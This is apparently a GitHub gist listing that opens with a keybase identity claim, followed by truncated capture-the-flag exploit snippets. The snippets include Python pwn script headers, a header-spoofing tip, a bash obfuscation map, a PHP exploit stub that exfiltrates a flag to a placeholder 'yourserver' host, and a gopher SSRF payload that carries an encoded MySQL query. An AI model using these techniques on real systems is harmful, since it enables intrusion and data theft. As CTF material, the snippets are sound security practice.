I hereby claim:
- I am eboda on github.
- I am eboda (https://keybase.io/eboda) on keybase.
- I have a public key whose fingerprint is F8B6 1392 DBFC 9B65 EB8C 4955 EBE1 91C1 FFBD 546A
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/bin/sh | |
sed '/^-/d' $1 | sed -e 's/^+/ /g' > $1.after | |
sed '/^+/d' $1 | sed -e 's/^-/ /g' > $1.before |
#!/usr/bin/env python | |
#coding: UTF-8 | |
import struct | |
import socket | |
import telnetlib | |
import sys | |
if len(sys.argv) > 1 and sys.argv[1] == "l": | |
print "=== local exploit" |
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
import requests | |
from PIL import Image | |
from StringIO import StringIO | |
def get_flag_rgb(): | |
rgb = [] | |
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content | |
for i in range(20, 480, 40): | |
rgb.append(pixel(flag, i)) |
Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For
header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag
import sys | |
m = { | |
'0' : '$[$?/$$]', | |
'1' : '$?', | |
'2' : '$[$?+$?]', | |
'3' : '$[$?+$?+$?]', | |
'4' : '$[$?+$?+$?+$?]', | |
'5' : '$[$?+$?+$?+$?+$?]', | |
'6' : '$[($?+$?+$?)*($?+$?)]', |
<?php | |
$target = 'http://127.0.0.1/'; | |
$exploit = 'http://yourserver:1337/exploit.php'; | |
$exfil = 'http://yourserver:1337/FLAG='; | |
function enc($s) { | |
$res = ''; | |
for ($i = 0; $i < strlen($s); $i++) { | |
$res .= '\\' . dechex(ord($s[$i])); | |
} |
gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35% |